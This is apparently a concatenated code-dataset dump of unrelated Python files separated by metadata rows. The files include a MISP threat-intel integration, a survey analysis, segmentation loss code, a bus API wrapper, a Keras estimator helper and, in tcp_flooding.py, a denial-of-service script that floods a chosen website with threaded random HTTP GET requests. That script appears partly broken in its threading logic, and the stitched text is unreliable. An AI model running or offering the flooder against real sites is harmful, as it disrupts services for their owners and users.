obj = build_generic_object(template, args)
return add_object(event_id, obj)
except ValueError as e:
raise DemistoException(
f'`attribute` parameter could not be decoded, may not a valid JSON\nattribute: {attributes}', str(e))
def convert_arg_to_misp_args(demisto_args, args_names):
return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)]
def add_ip_object(demisto_args: dict):
event_id = demisto_args.get('event_id')
ip_object_args = [
'dst_port',
'src_port',
'domain',
'hostname',
'ip_src',
'ip_dst'
]
# converting args to MISP's arguments types
misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args)
ips = argToList(demisto_args.get('ip'))
for ip in ips:
misp_attributes_args.append({'ip': ip})
if misp_attributes_args:
non_req_args = [
'first_seen',
'last_seen',
]
misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args))
misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None
obj = build_generic_object('ip-port', misp_attributes_args)
return add_object(event_id, obj)
else:
raise DemistoException(
f'None of required arguments presents. command {demisto.command()} requires one of {ip_object_args}')
def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids):
"""
Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the
suspicious tag ids set and will be stayed only in the malicious one (as a tag that was configured to be malicious is
stronger than recognised as suspicious).
"""
common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids)
suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids}
return malicious_tag_ids, suspicious_tag_ids
def is_tag_list_valid(tag_ids):
"""Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers."""
for tag in tag_ids:
try:
tag = int(tag)
if tag <= 0:
raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.")
except ValueError:
raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.")
def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute:
attribute_type = demisto_args.get('type')
distribution = demisto_args.get('distribution')
category = demisto_args.get('category')
comment = demisto_args.get('comment')
value = demisto_args.get('value')
first_seen = demisto_args.get('first_seen')
last_seen = demisto_args.get('last_seen')
attribute_instance = MISPAttribute()
attribute_instance.uuid = attribute_uuid
if attribute_type:
attribute_instance.type = attribute_type
if distribution:
attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution]
if category:
attribute_instance.category = category
if value:
attribute_instance.value = value
if comment:
attribute_instance.comment = comment
if first_seen:
attribute_instance.first_seen = first_seen
if last_seen:
attribute_instance.last_seen = last_seen
return attribute_instance
def update_attribute_command(demisto_args: dict) -> CommandResults:
attribute_uuid = demisto_args.get('attribute_uuid')
attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid)
attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid)
if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'):
raise DemistoException(attribute_instance_response.get('errors'))
human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n"
attribute = attribute_instance_response.get('Attribute')
convert_timestamp_to_readable(attribute, None)
parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute)
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=parsed_attribute_data,
)
def main():
params = demisto.params()
malicious_tag_ids = argToList(params.get('malicious_tag_ids'))
suspicious_tag_ids = argToList(params.get('suspicious_tag_ids'))
reliability = params.get('integrationReliability', 'B - Usually reliable')
if DBotScoreReliability.is_valid_type(reliability):
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)
else:
Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter")
attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True)
command = demisto.command()
demisto.debug(f'[MISP V3]: command is {command}')
args = demisto.args()
try:
malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids)
if command == 'test-module':
return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,
attributes_limit=attributes_limit))
elif command == 'misp-create-event':
return_results(create_event_command(args))
elif command == 'misp-add-attribute':
return_results(add_attribute(demisto_args=args))
elif command == 'misp-search-events':
return_results(search_events(args))
elif command == 'misp-search-attributes':
return_results(search_attributes(args))
elif command == 'misp-delete-event':
return_results(delete_event(args))
elif command == 'misp-add-sighting':
return_results(add_sighting(args))
elif command == 'misp-add-tag-to-event':
return_results(add_tag(args))
elif command == 'misp-add-tag-to-attribute':
return_results(add_tag(demisto_args=args, is_attribute=True))
elif command == 'misp-remove-tag-from-event':
return_results(remove_tag(args))
elif command == 'misp-remove-tag-from-attribute':
return_results(remove_tag(demisto_args=args, is_attribute=True))
elif command == 'misp-add-events-from-feed':
return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES))
elif command == 'file':
return_results(
generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'url':
return_results(
generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'ip':
return_results(
generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
elif command == 'domain':
return_results(
generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit))
elif command == 'email':
return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit))
elif command == 'misp-add-file-object':
return_results(add_file_object(args))
elif command == 'misp-add-domain-object':
return_results(add_domain_object(args))
elif command == 'misp-add-url-object':
return_results(add_url_object(args))
elif command == 'misp-add-ip-object':
return_results(add_ip_object(args))
elif command == 'misp-add-object':
return_results(add_generic_object_command(args))
elif command == 'misp-update-attribute':
return_results(update_attribute_command(args))
except PyMISPError as e:
return_error(e.message)
except Exception as e:
return_error(str(e))
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
| 41.869767
| 120
| 0.674295
| 8,050
| 63,014
| 5.019876
| 0.085466
| 0.025588
| 0.019055
| 0.01465
| 0.406533
| 0.334967
| 0.282999
| 0.235882
| 0.198293
| 0.161594
| 0
| 0.003746
| 0.224775
| 63,014
| 1,504
| 121
| 41.897606
| 0.823378
| 0.152442
| 0
| 0.202912
| 0
| 0.00546
| 0.177397
| 0.017067
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057325
| false
| 0.00273
| 0.007279
| 0.00091
| 0.134668
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8678e0fdfc11399c75f91f8ec0af910ceb4aab00
| 3,212
|
py
|
Python
|
python_survey/finished_files/main.py
|
trenton3983/PyCharmProjects
|
fae8653a25e07e7384eb0ddf6ea191adeb44face
|
[
"MIT"
] | null | null | null |
python_survey/finished_files/main.py
|
trenton3983/PyCharmProjects
|
fae8653a25e07e7384eb0ddf6ea191adeb44face
|
[
"MIT"
] | null | null | null |
python_survey/finished_files/main.py
|
trenton3983/PyCharmProjects
|
fae8653a25e07e7384eb0ddf6ea191adeb44face
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats
from finished_files.survey_data_dictionary import DATA_DICTIONARY
# Load data
# We want to take the names list from our data dictionary
names = [x.name for x in DATA_DICTIONARY]
# Generate the list of names to import
usecols = [x.name for x in DATA_DICTIONARY if x.usecol]
# dtypes should be a dict of 'col_name' : dtype
dtypes = {x.name : x.dtype for x in DATA_DICTIONARY if x.dtype}
# same for converters
converters = {x.name : x.converter for x in DATA_DICTIONARY if x.converter}
df = pd.read_csv('data/survey.csv',
header=0,
names=names,
dtype=dtypes,
converters=converters,
usecols=usecols)
#%% Clean up data: remove disqualified users
# In the survey, any user who selected they don't use Python was then
# disqualified from the rest of the survey. So let's drop them here.
df = df[df['python_main'] != 'No, I don’t use Python for my current projects']
# Considering we now only have two categories left:
# - Yes
# - No, I use Python for secondary projects only
# Let's turn it into a bool
df['python_main'] = df['python_main'] == 'Yes'
#%% Plot the web dev / data scientist ratio
# In the survey, respondents were asked to estimate the ratio between
# the amount of web developers vs the amount of data scientists. Afterwards
# they were asked what they thought the most popular answer would be.
# Let's see if there's a difference!
# This is a categorical data point, and it's already ordered in the data
# dictionary. So we shouldn't sort it after counting the values.
ratio_self = df['webdev_science_ratio_self'].value_counts(sort=False)
ratio_others = df['webdev_science_ratio_others'].value_counts(sort=False)
# Let's draw a bar chart comparing the distributions
fig = plt.figure()
ax = fig.add_subplot(111)
RATIO_COUNT = ratio_self.count()
x = np.arange(RATIO_COUNT)
WIDTH = 0.4
self_bars = ax.bar(x-WIDTH, ratio_self, width=WIDTH, color='b', align='center')
others_bars = ax.bar(x, ratio_others, width=WIDTH, color='g', align='center')
ax.set_xlabel('Ratios')
ax.set_ylabel('Observations')
labels = [str(lbl) for lbl in ratio_self.index]
ax.set_xticks(x - 0.5 * WIDTH)
ax.set_xticklabels(labels)
ax.legend((self_bars[0], others_bars[0]),
('Self', 'Most popular'))
plt.show()
#%% Calculate the predicted totals
# Let's recode the ratios to numbers, and calculate the means
CONVERSION = {
'10:1': 10,
'5:1' : 5,
'2:1' : 2,
'1:1' : 1,
'1:2' : 0.5,
'1:5' : 0.2,
'1:10': 0.1
}
self_numeric = df['webdev_science_ratio_self'] \
.replace(CONVERSION.keys(), CONVERSION.values())
others_numeric = df['webdev_science_ratio_others'] \
.replace(CONVERSION.keys(), CONVERSION.values())
print(f'Self:\t\t{self_numeric.mean().round(2)} web devs / scientist')
print(f'Others:\t\t{others_numeric.mean().round(2)} web devs / scientist')
#%% Is the difference statistically significant?
result = scipy.stats.chisquare(ratio_self, ratio_others)
# The null hypothesis is that they're the same. Let's see if we can reject it
print(result)
| 31.184466
| 79
| 0.699253
| 515
| 3,212
| 4.264078
| 0.384466
| 0.051002
| 0.010929
| 0.018215
| 0.160747
| 0.075137
| 0.075137
| 0
| 0
| 0
| 0
| 0.014965
| 0.188668
| 3,212
| 103
| 80
| 31.184466
| 0.827705
| 0.362702
| 0
| 0.039216
| 0
| 0
| 0.195749
| 0.091943
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.098039
| 0
| 0.098039
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8679399f0ab155a65d5523949359b9a4e0752af4
| 4,918
|
py
|
Python
|
adet/modeling/embedmask/mask_pred.py
|
yinghdb/AdelaiDet
|
94a9b7cde92fb039852f876964d991a1f3e15af4
|
[
"BSD-2-Clause"
] | 3
|
2021-05-21T08:02:48.000Z
|
2021-11-05T11:06:40.000Z
|
adet/modeling/embedmask/mask_pred.py
|
yinghdb/AdelaiDet
|
94a9b7cde92fb039852f876964d991a1f3e15af4
|
[
"BSD-2-Clause"
] | null | null | null |
adet/modeling/embedmask/mask_pred.py
|
yinghdb/AdelaiDet
|
94a9b7cde92fb039852f876964d991a1f3e15af4
|
[
"BSD-2-Clause"
] | 1
|
2021-05-24T06:53:32.000Z
|
2021-05-24T06:53:32.000Z
|
import torch
from torch.nn import functional as F
from torch import nn
from torch.autograd import Variable
from adet.utils.comm import compute_locations, aligned_bilinear
def dice_coefficient(x, target):
eps = 1e-5
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
intersection = (x * target).sum(dim=1)
union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
loss = 1. - (2 * intersection / union)
return loss
def lovasz_grad(gt_sorted):
"""
Computes gradient of the Lovasz extension w.r.t sorted errors
See Alg. 1 in paper
"""
p = len(gt_sorted)
gts = gt_sorted.sum()
intersection = gts - gt_sorted.float().cumsum(0)
union = gts + (1 - gt_sorted.float()).cumsum(0)
jaccard = 1. - intersection / union
if p > 1: # cover 1-pixel case
jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]
return jaccard
def lovasz_hinge(logits, labels):
"""
Binary Lovasz hinge loss
logits: [P] Variable, logits at each prediction (between -\infty and +\infty)
labels: [P] Tensor, binary ground truth labels (0 or 1)
"""
if len(labels) == 0:
# only void pixels, the gradients should be 0
return logits.sum() * 0.
signs = 2. * labels.float() - 1.
errors = (1. - logits * Variable(signs))
errors_sorted, perm = torch.sort(errors, dim=0, descending=True)
perm = perm.data
gt_sorted = labels[perm]
grad = lovasz_grad(gt_sorted)
loss = torch.dot(F.relu(errors_sorted), Variable(grad))
return loss
def lovasz_loss(x, target):
eps = 1e-6
n_inst = x.size(0)
x = x.reshape(n_inst, -1)
target = target.reshape(n_inst, -1)
x = torch.clamp(x, min=eps, max=1-eps)
x = torch.log(x) - torch.log(1 - x)
losses = []
for i in range(n_inst):
losses.append(lovasz_hinge(x[i], target[i]))
loss = torch.stack(losses)
return loss
def build_mask_pred(cfg):
return MaskPred(cfg)
class MaskPred(nn.Module):
def __init__(self, cfg):
super(MaskPred, self).__init__()
self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS
self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE
soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST
self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2]))
self.register_buffer("_iter", torch.zeros([1]))
self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE
self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA
def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None):
if self.training:
self._iter += 1
gt_inds = pred_instances.gt_inds
gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances])
gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype)
losses = {}
if len(pred_instances) == 0:
dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0
losses["loss_mask"] = dummy_loss
else:
mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
if self.mask_loss_type == "Dice":
mask_losses = dice_coefficient(mask_prob, gt_bitmasks)
loss_mask = mask_losses.mean()
elif self.mask_loss_type == "Lovasz":
mask_losses = lovasz_loss(mask_prob, gt_bitmasks)
loss_mask = mask_losses.mean()
losses["loss_mask"] = loss_mask * self.mask_loss_alpha
return losses
else:
if len(pred_instances) > 0:
mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride)
pred_instances.pred_global_masks = mask_prob
return pred_instances
def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride):
proposal_embed = instances.proposal_embed
proposal_margin = instances.proposal_margin
im_inds = instances.im_inds
dim, m_h, m_w = pixel_embed.shape[-3:]
obj_num = proposal_embed.shape[0]
pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds]
proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1)
proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1)
mask_var = (pixel_embed - proposal_embed) ** 2
mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3))
assert mask_feat_stride >= self.mask_out_stride
assert mask_feat_stride % self.mask_out_stride == 0
mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride))
return mask_prob
| 36.42963
| 135
| 0.637861
| 698
| 4,918
| 4.239255
| 0.23639
| 0.032443
| 0.033119
| 0.017574
| 0.25414
| 0.196688
| 0.165259
| 0.129774
| 0.104765
| 0.077729
| 0
| 0.01898
| 0.250102
| 4,918
| 134
| 136
| 36.701493
| 0.783351
| 0.06344
| 0
| 0.153061
| 0
| 0
| 0.01096
| 0
| 0
| 0
| 0
| 0
| 0.020408
| 1
| 0.081633
| false
| 0
| 0.05102
| 0.010204
| 0.234694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8679dfd086b9b3768ebf7c42ebcbb01fc263b720
| 2,569
|
py
|
Python
|
bongo/core.py
|
codeforamerica/bongo
|
a1b162c54fc51630ae1cfac16e1c136b0ff320a3
|
[
"BSD-3-Clause"
] | null | null | null |
bongo/core.py
|
codeforamerica/bongo
|
a1b162c54fc51630ae1cfac16e1c136b0ff320a3
|
[
"BSD-3-Clause"
] | null | null | null |
bongo/core.py
|
codeforamerica/bongo
|
a1b162c54fc51630ae1cfac16e1c136b0ff320a3
|
[
"BSD-3-Clause"
] | 1
|
2021-04-17T10:21:05.000Z
|
2021-04-17T10:21:05.000Z
|
"""
A simple wrapper for the Bongo Iowa City bus API.
"""
import requests as req
class Bongo(object):
"""
A simple Python wrapper for the Bongo Iowa City bus API.
"""
def __init__(self, format='json'):
self.format = format
def get(self, endpoint, **kwargs):
"""Perform a HTTP GET request to the API and return the data."""
if 'format' not in kwargs:
kwargs['format'] = self.format
url = "http://ebongo.org/api/%s" % (endpoint)
response = req.get(url, params=kwargs)
return self.convert(response)
def convert(self, response):
"""Convert a request based on the response type."""
content_type = response.headers['content-type']
if content_type == 'application/json':
data = response.json
elif 'stoplist' in response.url:
# The `stoplist` endpoint insists that it's HTML.
data = response.json
else:
data = response.content
return data
def route(self, tag=None, agency=None, **kwargs):
"""
Get information on a specific route, or all route listings.
>>> Bongo().route('lantern', 'coralville')
{"coralville's": {"lantern": "route"}}
"""
if agency and tag:
endpoint = 'route'
kwargs['agency'] = agency
kwargs['route'] = tag
else:
endpoint = 'routelist'
return self.get(endpoint, **kwargs)
def routes(self):
"""
Same as an empty call to the `route` method.
>>> Bongo().routes()
{"routes": [1234, 5678, 9999]}
"""
return self.route()
def stop(self, number=None, **kwargs):
"""
Retrieve information specific to a given stop number.
>>> Bongo().stop(8350)
{"stop": {"8350": "information"}}
"""
if number:
endpoint = 'stop'
kwargs['stopid'] = number
else:
endpoint = 'stoplist'
return self.get(endpoint, **kwargs)
def stops(self):
"""
Same as an empty call to the `stop` method.
>>> Bongo().stops()
{"stops": [1234, 5678, 9999]}
"""
return self.stop()
def predict(self, number, **kwargs):
"""
Predict the bus arrival times for a specific stop.
>>> Bongo().predict(8350)
{"stop": {"8350": "prediction"}}
"""
endpoint = 'prediction'
kwargs['stopid'] = number
return self.get(endpoint, **kwargs)
| 27.623656
| 72
| 0.534838
| 280
| 2,569
| 4.885714
| 0.310714
| 0.04386
| 0.028509
| 0.046053
| 0.180556
| 0.128655
| 0.084795
| 0.084795
| 0
| 0
| 0
| 0.023269
| 0.330868
| 2,569
| 92
| 73
| 27.923913
| 0.772542
| 0.318801
| 0
| 0.238095
| 0
| 0
| 0.088699
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.190476
| false
| 0
| 0.02381
| 0
| 0.404762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
867a45f315cdcc7854ea80a22125e3ed4f3423db
| 1,671
|
py
|
Python
|
src/security/tcp_flooding.py
|
janaSunrise/useful-python-snippets
|
f03285b8f0b44f87326ca982129dab80a18697f5
|
[
"Apache-2.0"
] | 1
|
2021-03-15T16:48:05.000Z
|
2021-03-15T16:48:05.000Z
|
src/security/tcp_flooding.py
|
janaSunrise/useful-python-snippets
|
f03285b8f0b44f87326ca982129dab80a18697f5
|
[
"Apache-2.0"
] | null | null | null |
src/security/tcp_flooding.py
|
janaSunrise/useful-python-snippets
|
f03285b8f0b44f87326ca982129dab80a18697f5
|
[
"Apache-2.0"
] | null | null | null |
import random
import socket
import string
import sys
import threading
import time
def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None:
# Threading support
thread_num = 0
thread_num_mutex = threading.Lock()
# Utility function
def print_status() -> None:
global thread_num
thread_num_mutex.acquire(True)
thread_num += 1
print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...")
thread_num_mutex.release()
def generate_url_path():
msg = str(string.ascii_letters + string.digits + string.punctuation)
data = "".join(random.sample(msg, 5))
return data
def attack_() -> None:
print_status()
url_path = generate_url_path()
dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
dos.connect((ip, port))
msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n"
dos.send(msg.encode())
except socket.error:
print(f"[ERROR] Site may be down | {socket.error}")
finally:
dos.shutdown(socket.SHUT_RDWR)
dos.close()
try:
host = host.replace("https://", "").replace("http://", "").replace("www.", "")
ip = socket.gethostbyname(host)
except socket.gaierror:
print("[ERROR] Make sure you entered a correct website!")
sys.exit(2)
all_threads = []
for i in range(request_count):
t1 = threading.Thread(target=attack)
t1.start()
all_threads.append(t1)
time.sleep(0.01)
for current_thread in all_threads:
current_thread.join()
| 26.109375
| 88
| 0.591263
| 209
| 1,671
| 4.583732
| 0.497608
| 0.065762
| 0.043841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015715
| 0.276481
| 1,671
| 63
| 89
| 26.52381
| 0.776675
| 0.020347
| 0
| 0.043478
| 0
| 0
| 0.134639
| 0.014688
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.130435
| 0
| 0.23913
| 0.108696
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
867addf71ccf4a2d2cc021bb3410dbc784317269
| 319
|
py
|
Python
|
test.py
|
wangjm12138/Yolov3_wang
|
3d143c7cd863dec796edede3faedacc6590cab5e
|
[
"MIT"
] | null | null | null |
test.py
|
wangjm12138/Yolov3_wang
|
3d143c7cd863dec796edede3faedacc6590cab5e
|
[
"MIT"
] | 8
|
2020-01-28T22:17:25.000Z
|
2022-03-12T00:04:30.000Z
|
test.py
|
wangjm12138/Yolov3_wang
|
3d143c7cd863dec796edede3faedacc6590cab5e
|
[
"MIT"
] | null | null | null |
import random
class Yolov3(object):
def __init__(self):
self.num=0
self.input_size=[8,16,32]
def __iter__(self):
return self
def __next__(self):
a = random.choice(self.input_size)
self.num=self.num+1
if self.num<3:
return a
else:
raise StopIteration
yolo=Yolov3()
for data in yolo:
print(data)
| 16.789474
| 36
| 0.702194
| 53
| 319
| 3.962264
| 0.584906
| 0.133333
| 0.12381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038023
| 0.175549
| 319
| 18
| 37
| 17.722222
| 0.760456
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.058824
| 0.058824
| 0.411765
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
867b9f7391f64037b68d280aea495bc5295d4119
| 1,256
|
py
|
Python
|
utils/turkish.py
|
derenyilmaz/personality-analysis-framework
|
9e1f3ac1047b1df07498159de23f88f87644d195
|
[
"MIT"
] | 1
|
2021-09-15T14:44:45.000Z
|
2021-09-15T14:44:45.000Z
|
utils/turkish.py
|
derenyilmaz/personality-analysis-framework
|
9e1f3ac1047b1df07498159de23f88f87644d195
|
[
"MIT"
] | 1
|
2022-03-12T00:48:01.000Z
|
2022-03-12T00:48:01.000Z
|
utils/turkish.py
|
derenyilmaz/personality-analysis-framework
|
9e1f3ac1047b1df07498159de23f88f87644d195
|
[
"MIT"
] | null | null | null |
class TurkishText():
"""Class for handling lowercase/uppercase conversions of Turkish characters..
Attributes:
text -- Turkish text to be handled
"""
text = ""
l = ['ı', 'ğ', 'ü', 'ş', 'i', 'ö', 'ç']
u = ['I', 'Ğ', 'Ü', 'Ş', 'İ', 'Ö', 'Ç']
def __init__(self, text):
self.text = text
def upper(self):
"""Converts the text into uppercase letters.
Returns string.
"""
res = ""
for i in self.text:
if i in self.l:
res += self.u[self.l.index(i)]
else :
res += i.upper()
return res
def lower(self):
"""Converts the text into lowercase letters.
Returns string.
"""
res = ""
for i in self.text:
if i in self.u:
res += self.l[self.u.index(i)]
else :
res += i.lower()
return res
def capitalize(self):
"""Converts each first letter to uppercase, and the rest to lowercase letters.
Returns string.
"""
m = self.text.split()
res = ""
for i in m:
res += TurkishText(i[0]).upper() + TurkishText(i[1:]).lower() + " "
return res[:-1:]
| 26.166667
| 86
| 0.468153
| 151
| 1,256
| 3.874172
| 0.344371
| 0.068376
| 0.047863
| 0.046154
| 0.283761
| 0.157265
| 0.157265
| 0.157265
| 0.157265
| 0.157265
| 0
| 0.003891
| 0.386147
| 1,256
| 47
| 87
| 26.723404
| 0.753567
| 0.265924
| 0
| 0.321429
| 0
| 0
| 0.017921
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.392857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
868018c92dba01d6288623e8f84851ac57ade115
| 3,427
|
py
|
Python
|
tf/estimators/keras_estimator.py
|
aspratyush/dl_utils
|
c067831f3c72aba88223c231c7fbc249d997e222
|
[
"Apache-2.0"
] | null | null | null |
tf/estimators/keras_estimator.py
|
aspratyush/dl_utils
|
c067831f3c72aba88223c231c7fbc249d997e222
|
[
"Apache-2.0"
] | null | null | null |
tf/estimators/keras_estimator.py
|
aspratyush/dl_utils
|
c067831f3c72aba88223c231c7fbc249d997e222
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Imports
import os
import numpy as np
import tensorflow as tf
def run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128):
"""
Run the estimator
"""
if optimizer is None:
optimizer = tf.keras.estimators.SGD(
lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True)
# 1. Compile the model
model.compile(
optimizer=optimizer, loss='categorical_crossentropy',
metrics=['accuracy'])
# 2. Create an estimator
model_est = tf.keras.estimator.model_to_estimator(
keras_model=model, model_dir='./lenet')
# Training
# 3a. Create the training function
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={model.input_names[0]: X['train'].astype(np.float32)},
y=Y['train'].astype(np.float32),
batch_size=nb_batches,
num_epochs=nb_epochs,
shuffle=True
)
# 3b. Train the model
model_est.train(input_fn=train_input_fn, steps=nb_epochs*nb_batches)
# Evaluate
# 4a. Evaluate the model
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={model.input_names[0]: X['test'].astype(np.float32)},
y=Y['test'].astype(np.float32),
batch_size=nb_batches,
num_epochs=nb_epochs,
shuffle=True
)
# 4b. Evaluate the model
model_eval = model_est.evaluate(input_fn=eval_input_fn)
print(model_eval)
return model_est, model_eval
def run_from_generator(
model, input_func=None, input_func_dict=None,
eval_func_dict=None, nb_epochs=10, optimizer=None, model_dir=None):
"""
Overloaded function to create an estimator using tf.data.Dataset
:param model : uncompiled keras model
:param input_fn : input function providing tf.data.Dataset to the estimator
:param input_fn_dict : dictionary containing input params for input_fn
:param eval_fn_dict : dictionary containing params for eval input_fn
:param model_dir : directory to store the trained model
"""
# 1. Create optimizer and compile model if optimizer is None
if (optimizer is None):
optimizer = tf.keras.optimizers.SGD(
lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True)
# 2. compile the model
model.compile(
optimizer=optimizer, loss='categorical_crossentropy',
metrics=['accuracy'])
# 3. create estimator
dir_path = os.path.join(os.getcwd(), model_dir)
print("Model path chosen : ", dir_path)
if (not os.path.exists(dir_path)):
os.mkdir(dir_path)
print("Creating estimator...")
est = tf.keras.estimator.model_to_estimator(
keras_model=model, model_dir=dir_path)
# 4. Train and Evaluate the model
print("Training...")
# training spec
train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict),
max_steps=500)
# evaluation spec
eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict))
# Run the training
model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec)
#est.train(input_fn=lambda: input_func(input_func_dict),
# steps=None)
#
